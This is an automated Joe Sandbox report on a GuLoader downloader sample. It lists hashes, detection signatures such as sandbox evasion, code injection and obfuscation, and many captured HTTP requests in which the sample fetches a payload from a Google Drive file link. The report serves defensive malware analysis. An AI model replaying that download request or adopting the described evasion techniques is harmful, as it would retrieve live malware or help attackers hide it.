Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nRNzqQOQwk.exe

Overview

General Information

Sample name:nRNzqQOQwk.exe
Analysis ID:1587595
MD5:c616c105a117d63de2b4f818c8fdd3e0
SHA1:fe7d7c8863a5f71e02b2b5b76e1a8f506b08dba7
SHA256:a180642558a07876a9a047217ef75504a4fe7e1f02e22e1f19ffba8d33e6790a
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • nRNzqQOQwk.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\nRNzqQOQwk.exe" MD5: C616C105A117D63DE2B4F818C8FDD3E0)
    • nRNzqQOQwk.exe (PID: 8016 cmdline: "C:\Users\user\Desktop\nRNzqQOQwk.exe" MD5: C616C105A117D63DE2B4F818C8FDD3E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:32:07.968991+010028032702Potentially Bad Traffic192.168.11.2049746142.250.190.110443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: nRNzqQOQwk.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: nRNzqQOQwk.exeVirustotal: Detection: 67%Perma Link
      Source: nRNzqQOQwk.exeReversingLabs: Detection: 70%
      Machine Learning detection for sample
      Source: nRNzqQOQwk.exeJoe Sandbox ML: detected
      Source: nRNzqQOQwk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49788 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49794 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49810 version: TLS 1.2
      Source: nRNzqQOQwk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49746 -> 142.250.190.110:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
